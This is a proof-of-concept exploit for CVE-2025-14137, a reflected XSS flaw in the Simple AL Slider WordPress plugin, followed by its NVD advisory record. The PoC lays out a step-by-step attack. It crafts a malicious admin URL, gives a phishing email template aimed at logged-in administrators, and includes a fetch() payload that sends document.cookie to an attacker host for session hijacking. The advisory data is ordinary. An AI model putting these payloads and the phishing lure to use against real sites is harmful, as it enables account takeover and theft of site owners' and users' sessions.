CVE-2025-14137

<!-- CVE-2025-14137 PoC - Reflected XSS in Simple AL Slider --> <!-- Payload: Inject JavaScript via PHP_SELF in URL path --> <!-- Step 1: Craft malicious URL --> <!-- Base URL: http://target-wordpress-site/wp-admin/admin.php Malicious path: /wp-admin/admin.php/"><script>alert(document.cookie)</script> Full URL: http://target-wordpress-site/wp-admin/admin.php/"><script>alert(document.cookie)</script> --> <!-- Step 2: Send to logged-in admin/user --> <!-- Email template: Subject: Please review this slider update Body: Please check the new slider configuration: http://target-wordpress-site/wp-admin/admin.php/"><script>fetch('https://attacker.com/steal?c='+document.cookie)</script> --> <!-- Step 3: When victim clicks, XSS executes --> <!-- Cookie stealing payload example --> <script> fetch('https://attacker-controlled-site.com/log?cookie=' + encodeURIComponent(document.cookie)); </script> <!-- Step 4: Session hijacking --> <!-- Attacker uses stolen cookie to impersonate admin --> <!-- Clean PoC URL (for testing in sandbox): --> <!-- http://vulnerable-site/wp-admin/admin.php/"><script>alert('XSS')</script> -->

{"cve": {"id": "CVE-2025-14137", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:47.880", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Simple AL Slider plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.2.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/simple-al-slider/tags/1.2.10/templates/admin/header.tpl#L46", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/simple-al-slider/trunk/templates/admin/header.tpl#L46", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/simple-al-slider/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e12e2ba1-fc4f-4ad0-80da-3504ef1e13d3?source=cve", "source": "[email protected]"}]}}